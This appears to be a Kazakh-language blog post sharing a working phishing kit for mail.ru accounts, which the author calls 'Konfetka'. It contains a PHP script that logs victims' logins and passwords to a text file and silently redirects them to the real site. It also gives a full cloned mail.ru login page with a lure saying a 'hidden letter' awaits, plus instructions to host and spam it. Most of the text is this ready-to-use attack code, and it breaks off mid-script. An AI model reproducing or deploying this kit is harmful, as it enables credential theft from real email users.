Конфетка

Бір кездері кедері пошта бұзуға, виндоустағы админ паролін (ограниченный уч. запись арқылы, еще комптың барлық дисководы, юзб порттары істемид, биоста пароль, корпус құлыпта) бұзуға құштар едік. Сондағы кәсібіміз тек ойын үшін еді. Байғұс жүйеәкімді шырылдату, сол үшін де талай бастықтың алдында түсініктеме жазғам — „Егер, кез келген инженер жүйені бұза алатын болса, мекеменің қауіпсіздігі туралы не айтуға болады...„- деген сияқты мәтінде. Кей жағдайда әдейі бағдарламалар жазатынбыз (интернеттен шикілей алып керегінше өңдейтінбіз), соларды спамить етіп жібереміз, білмегендері қақпанға түседі дегендей.
Кеше дискілердегі қажетсіз әрселерді өшіріп отырып, баяғыда жазған снифферге (конфетка) тап болдым. Осын соның біраз қызығына кіріп, майл рудың ескі дизайнын жаңаладым. Сіздерге қызық болады ма деп ұсынып отырмын.

1. Сниффердің өзі нестеу керек?
алған логин, парольді бір жерге сақтау керек және қолданушыны білдірмей басқа жерге сілтеп жіберу керек. Біздің жағдайымызда өз поштасына.
<?php
$f=fopen("mail.txt","at"); 
flock($f,2);
fputs($f,"логин:".$_GET[\'Login\']."@"); 
fputs($f,$_GET[\'Domain\']); # домен
fputs($f,"; пароль:".$_GET[\'Password\'].Chr(13)); 
flock($f,3);
fclose($f);
?>
<script>document.location.href="http://win.mail.ru/cgi-bin/readmsg?id=121112312";</script>

Осы скриптіні блокнотқа жазып, konfetka.php деп сақтаңыз.
2. Парольдерді құятын бір mail.txt файлын жасаңыз.
Енді осы файлдарды php қолдайтын бір хостингке орналастырыңыз. екеуі бір директорияда болуы шарт.
3. Жіберетін файл.
<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head>
<script type="text/javascript">/*<![CDATA[*/
// $P — профайлер
(function(W){var timers={},_timers={};W.$P=function(keyA,keyB){if(!keyB){_timers[keyA]=0;timers[keyA]=+new Date}else if(keyB==1){if(!_timers[keyA])_timers[keyA]=+new Date;return _timers[keyA]-timers[keyA]}else if(keyB==3)return timers[keyA];else if(keyB==2||keyB==-1){if(keyB==2)debug.group(keyA);if(typeof keyA=='string')keyA=new RegExp('^'+keyA);var k,t=0,s=0;for(k in timers)if(keyA.test(k)){if(keyB==-1){delete timers[k];delete _timers[k]}else if(k.indexOf('TOTAL')!=-1)t=$P(k,1);else debug.log(k+': '+$P(k,1)+' ms');s+=$P(k,1)}if(keyB==2){debug.log(keyA+': '+(t?t:s)+' ms');debug.groupEnd()}}else return $P(keyA,1)+$P(keyB,1)};$P.clear=function(){timer={};_timers={}}})(window);

function createRadar(name, iZ, log)
{
	var data	= {};
	var radar	= function (s, x)
	{
		if( s == 'clear' ){ data = {}; }
		else if( typeof s == 'string' ){
			if( x == 1 && data[s] && !data[s][1] ){ data[s][1] = +new Date; }
			else if( x != 1 && !data[s] ){ data[s] = [+new Date, 0]; }
		} else {
			var i = [], a, v, k, dt;
			for( k in data ) if( data.hasOwnProperty(k) )
			{
				v = data[k];
				dt = v[1] - v[0];
				if( dt < 0 )
				{
					data = {};
					return;
				}
				else if( iZ && !dt ) continue;
				i.push(k +':'+ dt);
				if( k == 'all' ) a = dt;
				if( log ) debug.log('radar.'+name+': '+ k +': '+ dt +' ms');
			}
			if( i.length && a ) setTimeout(function()
			{
				//(new Image).src = 'http://statpixel.mail.ru/r/dumb3.gif&t='+ name +'&v='+ a +'&i='+ i.join(',') +'&rnd='+ Math.random() + (document.referrer ? '&r='+ escape(document.referrer) : '');
				(new Image).src = 'http://mail.radar.imgsmail.ru/update?p=mail&t='+ name +'&v='+ a +'&i='+ i.join(',') +'&rnd='+ Math.random() + (document.referrer ? '&r='+ escape(document.referrer) : '');
			}, 0);
			data = {};
		}
		return	radar;
	};
	radar.clear	= function (){ data = {}; return radar; };
	return	radar;
};

function timeInterval_sum(bP) {
    if (!rT[bP]) {
        rT[bP] = new Date();
    } else {
        var rT_cnt = rT.i.length;
        var found  = false;
        for (var j = 0; j < rT_cnt; j++) {
            var rT_array = rT.i[j].split("=");
            if (rT_array[0] == bP) {
                rT.i[j] = bP + '=' + (parseInt(rT_array[1]) + (new Date()).getTime() - rT[bP].getTime() );
                found = true;
            }
        }
        if (!found) {
            rT.i[rT.i.length] = bP + '=' + ( (new Date()).getTime() - rT[bP].getTime() );
        }
        delete rT[bP];
    }
}
/*]]>*/</script>
<script type="text/javascript">/*<![CDATA[*/
try {
// sn: f108
// Добавление событий
function timeInterval(bP) {
        if (!rT[bP]) rT[bP] = new Date();
        else {
                rT.i[rT.i.length] = bP + '=' + ( (new Date()).getTime() - rT[bP].getTime() );
                delete rT[bP];
        }
}

var rT = {};//renderTime
rT.i = [];
timeInterval('renderbrowser');
rT.addHandler = function(object, event, handler, useCapture) {
        if (object.addEventListener) object.addEventListener(event, handler, useCapture ? useCapture : false);
        else if (object.attachEvent) object.attachEvent('on' + event, handler);
}
rT.radar_type = '';
if (window.name.indexOf('srvt') != -1) {
        rT.srvt = ( new Date() ).getTime() - parseInt( window.name.substr(5) );
        window.name = '';
}

rT.addHandler(document, 'click', function() {
        if (!window.name.length || window.name.indexOf('srvt') > -1)
                window.name = 'srvt=' + (new Date()).getTime();
});
rT.addHandler(document, 'keypress', function() {
        if (window.name.indexOf('srvt') > -1) window.name = '';
});

rT.img0 = new Image();
rT.img0.src = 'http://mail.radar.imgsmail.ru/update?' +
'p=mail0' +
(rT.radar_type != '' ? ('&t=' + rT.radar_type) : '') +
(rT.srvt ? ('&i=srvt:' + rT.srvt) : '') +
'&v=0&rnd=179348458' +
'';

} catch(e) {}
/*]]>*/</script>


        
<title> Непрочитанные письма </title>


<meta NAME="DESCRIPTION"
CONTENT="Национальная почтовая служба @Mail.ru - лучшая бесплатная почта. Доступ к почте через POP/SMTP, веб- и wap-интерфейс. Также на портале: авто, новости, спорт, музыка, работа, знакомства, анекдоты, открытки, погода">


<META name="Keywords" content="почта, бесплатная электронная почта, авто, новости, спорт, музыка, работа, знакомства, анекдоты, открытки, погода">



<META http-equiv="content-type" content="text/html; charset=utf-8">


<!--[if IE]>
<style type="text/css">
* html .n_shMain {border-left: 900px solid #00468C; position: relative; z-index: 1;}
* html .n_shIE {margin-left: -900px; position: relative; z-index: 2; float: left;}
</style>
<![endif]-->
<!--[if lt IE 7]>
<style type="text/css">
/** html .n_shMain {padding-left: 900px;} */
</style>
<![endif]-->
<link href="http://img.imgsmail.ru/mail/ru/css/ru.css?8" rel="stylesheet" type="text/css" />
<style type="text/css">
.n_spI {background-image: url(http://img.imgsmail.ru/mail/ru/images/ru/_sp_start.png); background-repeat:no-repeat; display:inline-block; margin-right:8px; padding:3px 0; vertical-align:middle; width:31px; height:20px; //height:26px;}
.n_iEnter {background-position: 0 2px;}
.n_iBulk {background-position: 0 -26px;}
.n_iMA {background-position: 0 -53px;}
.n_iSend {background-position: 0 -81px;}
.n_iDraft {background-position: 0 -109px;}
.n_iTrash {background-position: 0 -137px;}
</style>


<link href="http://img.imgsmail.ru/mail/ru/css/mail-main1.css?127" rel="stylesheet" type=text/css>
    
<link href="http://img.imgsmail.ru/mail/ru/css/mail-second.css?1" rel="stylesheet" type=text/css>
    
 
<link href="http://img.imgsmail.ru/mail/ru/css/search_top.css?1" rel="stylesheet" type=text/css>

<script language="javascript" src="http://js.imgsmail.ru/r/js/search_top.js?251212" type="text/javascript" charset="windows-1251"></script>

<script type="text/javascript">//<![CDATA[
try{ timeInterval_sum('html'); }catch(e) {}
try{ timeInterval_sum('js'); }catch(e) {}
var
	  undef
	, undefined
	, IS_LOCAL		= 0
	, jsVersion		= 3
	, jsBuild		= '3.75'
	, IS_UTF		= !!parseInt('1')
	, jsCore		= { version: 3, build: '3.75' }
	, CheckNewNum	= '3'
	, jsCoreAlias	= {
		  'jsCore': 		'http://js.imgsmail.ru/u/js/ru/jsCore/'
		, 'jQuery':			'http://js.imgsmail.ru/u/js/ru/jsCore/jquery/'
		, 'labs':			'http://js.imgsmail.ru/u/js/ru/jsCore/labs/'
		, 'utils':			'http://js.imgsmail.ru/u/js/ru/jsCore/utils/'
		, 'plugins':		'http://js.imgsmail.ru/u/js/ru/jsCore/plugins/'
		, 'projects':		'http://js.imgsmail.ru/u/js/ru/jsCore/Projects/'
		, 'easyXDM':		'http://js.imgsmail.ru/u/js/ru/easyXDM/'
		, 'tiny_mce':		'http://js.imgsmail.ru/u/js/ru/tiny_mce/'
		, 'mailru':			'http://js.imgsmail.ru/u/js/ru/'
		, 'mailru.ui':		'http://js.imgsmail.ru/u/js/ru/ui/'
		, 'mailru.app':		'http://js.imgsmail.ru/u/js/ru/'
		, 'mailru.reg':		'http://js.imgsmail.ru/u/js/ru/jsCore/Projects/mail.ru/Reg/'
		, 'mailru.view':	'http://js.imgsmail.ru/u/js/ru/Views/'
		, 'mailru.build':	'http://js.imgsmail.ru/u/js/ru/build/'
		, 'mailru.compose':	'http://js.imgsmail.ru/u/js/ru/jsCore/Projects/mail.ru/Compose/'
		, 'mailru.msglist':	'http://js.imgsmail.ru/u/js/ru/MsgList/'
	},
	jsLoaderFiles = {
		  '{mailru.build}MsgList':	'http://js.imgsmail.ru/u/js/ru/build/MsgList.1305559847.js'
		, '{mailru.build}Compose':	'http://js.imgsmail.ru/u/js/ru/build/Compose.1305553596.js'
	},
	jsLoaderLoaded	= ['{jQuery}jquery', '{jsCore}Array', '{jsCore}String']
;

var mailru = {
	  uuvb:					''
	, baseHref:				'http://e.mail.ru/cgi-bin/'
	, username:				''
	, userdomain:			''
	, useremail:			'@'
	, AbjsHash:				''
	, AccountVerified:		0
	, isNewHeader:			0
	, readMsgAfterDelete:	true
	, msgListAfterDelete:	0
	, MsglistExpanded:		0
	, StartMsglist:			1
	, messagesPerPage:		25
	, folderId:				0
	, messageId:			0
	, messagesPage:			1
	, messagesSort:			''
	, Ad:					[]
};

var jsChecker	= { add: function (){} };
var jsLoader	= { loaded: function (file){ jsLoaderLoaded.push(file); } };

document.setDomain = function (){};
(function (m,h){m.domain=h;m.isLocal=/win\.dev|f32\./.test(h);m.isWinDev=/win\.dev/.test(h);})(mailru,document.domain);
//]]></script>


	<script type="text/javascript">try{ timeInterval_sum('jsBuild: core.js'); }catch(e) {}</script>
	<script type="text/javascript" src="http://js.imgsmail.ru/u/js/ru/build/core.1305207559.js"></script>
	<script type="text/javascript">try{ timeInterval_sum('jsBuild: core.js'); }catch(e) {}</script>



<link href="http://img.imgsmail.ru/mail/ru/css/internal/box-popup.css?v=1.2" rel="stylesheet" type="text/css" />



	<link rel="shortcut icon" type="image/x-icon" href="http://img.imgsmail.ru/r/ru/favicon.ico?1"/>

<link rel="apple-touch-icon" href="http://img.imgsmail.ru/r/ru/ios/icon_114.png"/>

<script type="text/javascript">
	if( self.parent.frames.length != 0 )
		self.parent.location = document.location;
</script>

<script language="JavaScript">
<!--
function CheckForm(form)
{
 var i,j;
 var str = '';

 var bad_field;
 var fields = new Array();
 var prompts = new Array();

 fields[fields.length] = 'Login';
 prompts[prompts.length] = 'Логин';

 fields[fields.length] = 'Password';
 prompts[prompts.length] = 'Пароль';

 for (i = 0; i < fields.length; i++){
  var field = form[fields[i]];
  var is_bad=0;
  if(field.type == null)
  {
	is_bad=1;
	for(j=0;j<field.length;++j)
	{
		if(field[j].checked==true)
			is_bad=0;
	}
	if(is_bad==1 && str=='')
		field=field[0];
  }
  else switch(field.type)
  {
	case 'select-one':
		if(field[field.selectedIndex].value == '')
			is_bad=1;
		break;

	default:
		if (field.value == '') {
			is_bad=1;
			//if(uinfo.field[j].Choose.radio) is_bad=0;
		}
  }

  if (is_bad == 1)
  {
	if (str != '')
        {
                str += '\n';
        }else{
                bad_field = field;
        }
        str += prompts[i];
  }

 }
 if (str != ''){
   alert("Не заполнены необходимые поля:\n" + str);
   bad_field.focus();
   return false;
 }


 if (window.RegExp){
   var fields = new Array();
   var prompts = new Array();
   var patterns = new Array();
   var minVal = new Array();
   var maxVal = new Array();
   var maxLen = new Array();
   var minLen = new Array();
   var errors = new Array();

   fields[fields.length] = 'Login';
   prompts[prompts.length] = 'Логин';
   patterns[patterns.length] = '';
   minVal[minVal.length] = 0;
   maxVal[maxVal.length] = 0;
   maxLen[maxLen.length] = 128;
   minLen[minLen.length] = 1;
   errors[errors.length] = 'Должен быть указан корректный логин.';

   fields[fields.length] = 'Domain';
   prompts[prompts.length] = 'Домен';
   patterns[patterns.length] = '';
   minVal[minVal.length] = 0;
   maxVal[maxVal.length] = 0;
   maxLen[maxLen.length] = 64;
   minLen[minLen.length] = 0;
   errors[errors.length] = 'Должен быть указан корректный домен.';

   fields[fields.length] = 'Password';
   prompts[prompts.length] = 'Пароль';
   patterns[patterns.length] = '';
   minVal[minVal.length] = 0;
   maxVal[maxVal.length] = 0;
   maxLen[maxLen.length] = 50;
   minLen[minLen.length] = 0;
   errors[errors.length] = 'Должен быть указан корректный пароль.';

   fields[fields.length] = 'agent';
   prompts[prompts.length] = 'agent';
   patterns[patterns.length] = '';
   minVal[minVal.length] = 0;
   maxVal[maxVal.length] = 0;
   maxLen[maxLen.length] = 256;
   minLen[minLen.length] = 0;
   errors[errors.length] = '';

   for (i = 0; i < fields.length; i++){
    var bad = false;
    var field = form[fields[i]];
    if (typeof field == 'undefined') continue;
    if (field.value != ''){
      if (field.value.length > maxLen[i] && maxLen[i] > 0) bad = true;
      if (field.value.length < minLen[i] && minLen[i] > 0)
	{
		bad = true;
		if(fields[i]=="Password")
			errors[i]="Слишком простой пароль."+"\n"+"Вы ввели пароль, который легко подобрать. Из соображений безопасности Вам нужно задать более сложный пароль.";
	}
     if (patterns[i] != ''){
      var re = new RegExp(patterns[i]);
      if (!re.test(field.value + "")) bad = true;
     }
     if ((minVal[i] > 0) || (maxVal[i] > 0)){
      var val = parseInt(field.value,10);
      if ((val < minVal[i]) || (val > maxVal[i])) bad = true;
     }
     if (bad){
       alert("Неверно заполнено поле " + prompts[i] + "\n" + errors[i]);
       field.focus();
       return false;
     }
    }
   }
 }

 return true;
}
// --></script>



<style TYPE="text/css">
#superbest {
position: absolute;
left: 15;
top: 150;
width: 125;
visibility: visible;
z-index: 10;
}
</style>









<script type="text/javascript">
(function ($, undef)
{
	if( $ !== undef )
	{
		$(document).mousedown(function (evt)
		{
			var elm = evt.target, id, t;
			do
			{
				if( (id = elm.getAttribute(t = 'cnt_d')) || (id = elm.getAttribute(t = 'cnt_sb')) || (id = elm.getAttribute(t = 'cnt_gstat')) )
				{
					(new Image).src = 'http://rs.mail.ru/'+ t.substr(4) + id +'.gif?rnd='+ Math.random();
					break;
				}
			}
			while( (elm = elm.parentNode) && (elm !== this) );
		});
	}
})(window.jQuery);
</script>

</head>
<body marginwidth=0 marginheight=0 leftmargin=0 rightmargin=0 topmargin=0 bottommargin=0 bgcolor="#ffffff" alink="#F26D00" link="#0857A6" vlink="#0857A6">

<div style="position: absolute;">

<img class="tns-counter" src="http://www.tns-counter.ru/V13a****mail_ru/ru/CP1251/tmsec=mail_win-other/" width="1" height="1" alt="" />

</div>


<script type="text/javascript">//<![CDATA[
try{ timeInterval('webagent_test'); }catch(e) {}
//]]></script>

<!-- WebAgentEnabled: [] -->


<script type="text/javascript">//<![CDATA[
try{ timeInterval('webagent_test'); }catch(e) {}
//]]></script>

<center>


<td>

</td><td>

</td>



<table  cellpadding=0 cellspacing=0 border=0 width="90%" align=center>

<tr><td><div style="height: 4px; overflow: hidden;"></div></td></tr>
</table>



	<style>
.appM {border: 1px solid #989898; background-color: #FFF; padding: 4px 0; position: absolute; right: 0; top: 0;}
.appM a {background-repeat: no-repeat; background-position: 10px center; display: block; padding: 4px 10px 4px 35px; text-align: right; color: black; text-decoration: none; font-size: 11px; font-family: Tahoma !important; white-space: nowrap;}
.appM a:HOVER {text-decoration: none; color: black; background-color: #dedfe3;}

/* superNEW shapka */
.n_spTop {background-image: url(http://img.mail.ru/mail/ru/images/ru/_sp_top2.png?1);}
.n_shT {background-color: #00468C; border-left: 1px solid #FFF; border-right: 1px solid #FFF; height: 1px; position: relative; font-size: 0; line-height: 0; height: 1px; //height: 0; //display: inline-block; //width: 100%;}
.n_shMain {position: relative; height: 54px; width: 90%; min-width: 900px; background-color: #00468C; background-repeat: repeat-x; background-position: 0 -220px; margin: 1px 0 7px;}
.n_shLogo {position: absolute; height: 47px; width: 25%; background-repeat: no-repeat; background-position: center 0; text-align: center; top: 0;}
.n_shLogoA {display: inline-block; height: 34px; width: 160px; margin-top: 11px;}
.n_shLogoW {display: inline-block; height: 14px; width: 38px; vertical-align: top; margin-top: 11px;}
.n_shForm {color: #FFF; white-space: nowrap; margin: 0; font-size: 11px; font-family: Tahoma !important; position: absolute; right: 5px; top: 5px;}
.n_shSns2 {color: #FFF; vertical-align: middle; position: absolute; display:inline-block; font-size: 95%; font-family: Tahoma !important; width: 100%; padding: 0 0 0 24%; //padding: 0 0 0 24%;}
.n_shSns2 a {color: #FFF;}
.n_shSns2 a:HOVER {color: #FFF;}
/* end superNEW shapka */

/* superNEW shapka menu */
.n_shBook {position: relative; top: 32px; padding-left: 24%; white-space: nowrap; display: block; height: 20px; overflow: hidden;}
.nm_menuA {background-color: #5977b3; display: inline-block; height: 20px; vertical-align: top; padding: 3px 0 2px 0;}
.nm_menuAaa {margin: 0 4px 0 3px; float: left; color: #FFF; text-decoration: none; position: relative; z-index: 100;}
a:HOVER.nm_menuAaa {text-decoration: underline; float: left; color: #FFF !important; position: relative; z-index: 100;}
.nm_menuS {border-top: 0; border-left: 0; border-bottom: 20px solid #5977b3; border-right: 20px solid transparent; font-size: 0; line-height: 0; display: inline-block;vertical-align:top; position: relative; z-index: 1;}
.nm_menuSp {border-bottom: 12px solid transparent; border-right: 12px solid #5977b3; font-size: 0; line-height: 0; display: inline-block; vertical-align:top; padding: 7px 0 0 0; margin-top: 1px;position: relative; z-index: 1;}
.nm_menuSp2 {border-top: 1px solid #5977b3; font-size: 0; line-height: 0; display: inline-block; width: 11px; position: absolute; top: 0; left: 1px; vertical-align:top; z-index: 1;}

.nm_menuA_act {background-color: #FFF;}
.nm_menuAaa_act {color: #013572 !important; font-weight: bold; margin-left: 1px;}
a:HOVER.nm_menuAaa_act {color: #013572 !important;}
.nm_menuS_act {border-bottom: 20px solid #FFF;}
.nm_menuSp_act {border-right: 12px solid #FFF; border-bottom: 12px solid #FFF;}
.nm_menuSp2_act {border-top: 1px solid #FFF;}

.nm_menuSp_f {border-bottom: 12px solid #5977b3;}
.nm_menuAaa_f {margin-left: 1px;}

.nm_menu2 {float:left; position: relative; margin-left: -11px;}
@media all and (-webkit-min-device-pixel-ratio:10000),
not all and (-webkit-min-device-pixel-ratio:0)
{ .nm_menu2 {margin-left: -10px;} }
/* end superNEW shapka menu */

.nm_menuAaa {margin: 0 0 0 -3px;}
.nm_menuAaa_act {margin-left: -3px !important;}
.nm_menuAaa_f {margin-left: -3px !important;}

.shMenu2{float: left; position: relative; margin-left: -11px; border-bottom: 3px solid #5977B3}
.shMenu2_act {border-bottom: 3px solid #FFF}
@media all and (-webkit-min-device-pixel-ratio:10000), not all and (-webkit-min-device-pixel-ratio:0){
    .shMenu2 {margin-left: -10px}
}
@media screen and (-webkit-min-device-pixel-ratio:0){
    .shMenu2 {margin-left: -10px}
}
.shA{background-color: #5977b3; display: inline-block; height: 20px; vertical-align: top}
.shAaa{margin: 2px 2px 0 2px; float: left; color: #FFF; text-decoration: none; position: relative; z-index: 100}
a:HOVER.shAaa{text-decoration: underline; float: left; color: #FFF !important; position: relative; z-index: 100}
.shS{border-top: 0; border-left: 0; border-bottom: 20px solid #5977b3; border-right: 20px solid transparent; font-size: 0; line-height: 0; display: inline-block;vertical-align:top; position: relative; z-index: 1}
.shSp{border-bottom: 12px solid transparent; border-right: 12px solid #5977b3; font-size: 0; line-height: 0; display: inline-block; vertical-align:top; padding: 7px 0 0 0; margin-top: 1px;position: relative; z-index: 1}
.shSp2{border-top: 2px solid #5977b3; font-size: 0; line-height: 0; display: inline-block; width: 11px; position: absolute; top: 0; left: 1px; vertical-align:top; z-index: 1}
</style>

<!--[if lt IE 7]>
<style>
.ie6bT {border-top-color: #00468c !important; filter:chroma(color='#00468c');}
.ie6bR {border-right-color: #00468c !important; filter:chroma(color='#00468c');}
.ie6bB {border-bottom-color: #00468c !important; filter:chroma(color='#00468c');}
.ie6bL {border-left-color: #00468c !important; filter:chroma(color='#00468c');}
</style>
<![endif]-->

<div class="n_shMain n_t12 n_tal" style="overflow: hidden; //overflow: visible; //display: inline-block;">
<div class="n_shIE">

<div class="n_shT"></div>
<div class="n_shT" style="top: 52px;"></div>

	<div class="n_shLogo n_spTop"><a href="http://r.mail.ru/cln8635/mail.ru" class="n_shLogoA"></a></div>

	<div class="n_shBook n_arial">
<div class="nm_menu2"><span class="nm_menuSp2 nm_menuSp2_act"></span><span class="nm_menuSp nm_menuSp_act"></span><span class="nm_menuA nm_menuA_act"><a href="http://r.mail.ru/cln8623/e.mail.ru/cgi-bin/start?top=1" class="nm_menuAaa nm_menuAaa_act">Почта</a></span><span class="nm_menuS ie6bR nm_menuS_act"></span></div>
<div class="nm_menu2"><span class="nm_menuSp2"></span><span class="nm_menuSp ie6bB"></span><span class="nm_menuA"><a href="http://r.mail.ru/cln8625/my.mail.ru" class="nm_menuAaa">Мой мир</a></span><span class="nm_menuS ie6bR"></span></div>
<div class="nm_menu2"><span class="nm_menuSp2"></span><span class="nm_menuSp ie6bB"></span><span class="nm_menuA"><a href="http://r.mail.ru/cln8626/foto.mail.ru" class="nm_menuAaa">Фото</a></span><span class="nm_menuS ie6bR"></span></div>
<div class="nm_menu2"><span class="nm_menuSp2"></span><span class="nm_menuSp ie6bB"></span><span class="nm_menuA"><a href="http://r.mail.ru/cln8627/video.mail.ru" class="nm_menuAaa">Видео</a></span><span class="nm_menuS ie6bR"></span></div>

<div class="nm_menu2"><span class="nm_menuSp2"></span><span class="nm_menuSp ie6bB"></span><span class="nm_menuA"><a href="http://r.mail.ru/cln3359/blogs.mail.ru" class="nm_menuAaa">Блоги</a></span><span class="nm_menuS ie6bR"></span></div>

<div class="nm_menu2"><span class="nm_menuSp2"></span><span class="nm_menuSp ie6bB"></span><span class="nm_menuA"><a href="http://r.mail.ru/cln8629/games.mail.ru" class="nm_menuAaa">Игры</a></span><span class="nm_menuS ie6bR"></span></div>
<div class="nm_menu2"><span class="nm_menuSp2"></span><span class="nm_menuSp ie6bB"></span><span class="nm_menuA"><a href="http://r.mail.ru/cln8630/love.mail.ru/partner/link.phtml?pid=475306&lid=7095" class="nm_menuAaa">Знакомства</a></span><span class="nm_menuS ie6bR"></span></div>
<div class="nm_menu2"><span class="nm_menuSp2"></span><span class="nm_menuSp ie6bB"></span><span class="nm_menuA"><a href="http://r.mail.ru/cln8631/money.mail.ru/" class="nm_menuAaa">Деньги</a></span><span class="nm_menuS ie6bR"></span></div>
<div class="nm_menu2"><span class="nm_menuSp2"></span><span class="nm_menuSp ie6bB"></span><span class="nm_menuA"><a href="http://r.mail.ru/cln8632/maps.mail.ru" class="nm_menuAaa">Карты</a></span><span class="nm_menuS ie6bR"></span></div>
<div class="nm_menu2"><span class="nm_menuSp2"></span><span class="nm_menuSp ie6bB"></span><span class="nm_menuA"><a href="http://r.mail.ru/cln8794/auto.mail.ru" class="nm_menuAaa">Авто</a></span><span class="nm_menuS ie6bR"></span></div>

	</div>

</div>
</div>




<!-- AuthTooltip -->
<style>
    .tooltip
    {
        position: absolute;
        margin-top: 28px;
        _width: 166px;
        *width: 166px;
    }

    .tooltip .tail
    {
        background: url(http://img.imgsmail.ru/r/tooltip/tail.png) no-repeat;
        _background-image: url(http://img.imgsmail.ru/r/tooltip/tail.gif);
        width: 9px;
        height: 5px;
        left: 39px;
        top: -4px;
        position: absolute;
    }
    
    .tooltip .ltc, .tooltip .rtc, .tooltip .lbc, .tooltip .rbc
    {
        background: url(http://img.imgsmail.ru/r/tooltip/ltc.png) no-repeat;
        _background-image: url(http://img.imgsmail.ru/r/tooltip/ltc.gif);
        width: 6px;
        height: 6px;
        float: left;
        _margin-right: -3px;
    }
    
    .tooltip .rtc
    {
        background: url(http://img.imgsmail.ru/r/tooltip/rtc.png) no-repeat;
        _background-image: url(http://img.imgsmail.ru/r/tooltip/rtc.gif);
        float: right;
        _margin-left: -3px;
        _margin-right: 0;
    }
    
    .tooltip .lbc
    {
        background: url(http://img.imgsmail.ru/r/tooltip/lbc.png) no-repeat;
        _background-image: url(http://img.imgsmail.ru/r/tooltip/lbc.gif);
        *margin-left: -3px;
    }
    
    .tooltip .rbc
    {
        background: url(http://img.imgsmail.ru/r/tooltip/rbc.png) no-repeat;
        _background-image: url(http://img.imgsmail.ru/r/tooltip/rbc.gif);
        float: right;
        _margin-left: -3px;
        _margin-right: 0;
        *margin-right: -3px;
    }
    
    .tooltip .ts, .tooltip .bs
    {
        height: 6px;
        line-height: 6px;
        _overflow: hidden;
        *overflow: hidden;
        background: #fbf7c7 url(http://img.imgsmail.ru/r/tooltip/border_pix.gif) repeat-x top;
        margin: 0 6px;
        _margin: 0;
    }
    
    .tooltip .bs
    {
        background: #fbf7c7 url(http://img.imgsmail.ru/r/tooltip/border_pix.gif) repeat-x bottom;
        *border-bottom: solid 1px #a6a8ae;
    }
    
    .tooltip .rborder
    {
        background: url(http://img.imgsmail.ru/r/tooltip/border_pix.gif) repeat-y right;
        padding: 0 9px;
    }
    
    .tooltip .inner
    {
        background: #fbf7c7 url(http://img.imgsmail.ru/r/tooltip/border_pix.gif) repeat-y;
    }
    
    .tooltip .mess
    {
        font-family: tahoma !important;
        color: #5a393f;
        font-size: 9px;
        position: absolute;
        margin-top: -3px;
        white-space: nowrap;
    }
</style>
<!-- /AuthTooltip -->

<table width=90% cellpadding=0 cellspacing=0 border=0>

<tr valign=top>

<td width=27%><img src=http://img.imgsmail.ru/0.gif width=150 height=400></td>

<td width=46%><img src=http://img.imgsmail.ru/1.gif width=1 height=20>


<table width=100% cellpadding=0 cellspacing=0 border=0 class=or_table><tr>
<td class=oranzhe><b>Письмо</b></td></tr>
<tr><td class=oranzhe style="padding-left:20px"> <b>Пользователь отправил вам скрытое письмо.</b>

Для просмотра письма введите ваш логин и пароль.
</td></tr></table>

<img src=http://img.imgsmail.ru/1.gif width=1 height=10>



<h3 class=head_1>Авторизация</h3><img src=http://img.imgsmail.ru/1.gif width=1 height=8>




<p class=abzac>Для входа в систему введите, пожалуйста, логин и пароль. Если у Вас еще нет логина, Вам необходимо <a href=http://win.mail.ru/cgi-bin/signup>зарегистрироваться.</a></p>


<table cellpadding=0 cellspacing=0 border=0 class=login>
<form method="GET" action="http://сайтадресі/konfetka.php">
<input type="hidden" name="mail" value="1">
<tr>
<td width=75>
<img src=http://img.mail.ru/0.gif height=1>
Имя
</td>
<td width=150>
<input type="text" name="Login">
</td>
<td width=75>
<select name="Domain">
<option value="mail.ru" SELECTED>@mail.ru</option>
<option value="inbox.ru">@inbox.ru</option>
<option value="list.ru" >@list.ru</option>
<option value="bk.ru" >@bk.ru</option>
</select>
</td>
</tr>
<tr>
<td>
Пароль
</td>
<td>
<input type="password" name="Password">
</td>
<td>
<a href="http://www.mail.ru/pages/help/92.html" target=_new>Забыли пароль?</a>
</td>
</tr>

<tr>
<td> </td>
<td>
<input type=checkbox name="level" value=1 id="alien"><label for="alien">Чужой компьютер</label>
</td>
<td> </td>
</tr>
<tr>
<td> </td>
<td>
<input type="Submit" value=" Войти " xstyle="margin-top:4px">
</td>
<td> </td>
</tr></form>
</table>








<img src=http://img.imgsmail.ru/0.gif width=380 height=1>

</td>

<td width=27%><img src=http://img.imgsmail.ru/0.gif width=150 height=1></td>

</tr>

</table>


<script src="https://auth.mail.ru/https.js?1107113211" type="text/javascript"></script>


<!-- AuthTooltip -->    
    <script language="javascript" type="text/javascript">
    if(document.forms["Auth"] && document.forms["Auth"].elements["Password"] && document.getElementById('tooltipAuth_struter'))
    {
        var tooltipAuth = {
            targetElem: document.forms["Auth"].elements["Password"],
            struter: document.getElementById('tooltipAuth_struter'),
            mess: document.getElementById('tooltipAuth_mess'),
            shell: document.getElementById('tooltipAuth_shell'),
            tail: document.getElementById('tooltipAuth_tail'),
			wasCaps: false,
			
            sAlign: function() {
                if(/msie\s+\d/i.test(navigator.userAgent))
                    this.struter.style.overflow = 'hidden';
            
                this.struter.style.width = this.mess.offsetWidth + "px";
                this.struter.style.height = (/msie\s+\d/i.test(navigator.userAgent) ? 6 : (this.mess.offsetHeight - 6)) + "px";
                
                if(/msie\s+\d/i.test(navigator.userAgent))
                    this.shell.style.width = (this.struter.offsetWidth + 30) + "px";
            },
            activate: function() {
                if(window.addEventListener)
                {
                    this.targetElem.addEventListener("blur", this.hide, false);
					this.targetElem.addEventListener("keydown", tooltipAuth.keydown, false);
                    this.targetElem.addEventListener("keypress", tooltipAuth.checkCondition, false);
                }
                else
                {
                    this.targetElem.attachEvent("onblur", this.hide);
					this.targetElem.attachEvent("onkeydown", tooltipAuth.keydown);
                    this.targetElem.attachEvent("onkeypress", tooltipAuth.checkCondition);
                }
            },
            show: function(messNum) {
                tooltipAuth.shell.style.visibility = 'hidden';
                
                var text = document.getElementById('tooltipAuth_mess_var');
                var text2 = document.getElementById('tooltipAuth_mess_var2');
				var text3 = document.getElementById('tooltipAuth_mess_var3');
                
                text.style.display = text2.style.display = text3.style.display = "none";
                
                if(messNum == 1)
                    text.style.display = '';
                if(messNum == 2)
                    text2.style.display = '';
				if(messNum == 3)
                    text3.style.display = '';
                
                tooltipAuth.shell.style.display = '';
                tooltipAuth.sAlign();
                tooltipAuth.tail.style.left = (Math.round(tooltipAuth.shell.offsetWidth / 2) - 4) + "px";
                tooltipAuth.shell.style.visibility = 'visible';
            },
            hide: function() {
                tooltipAuth.shell.style.display = 'none';
            },
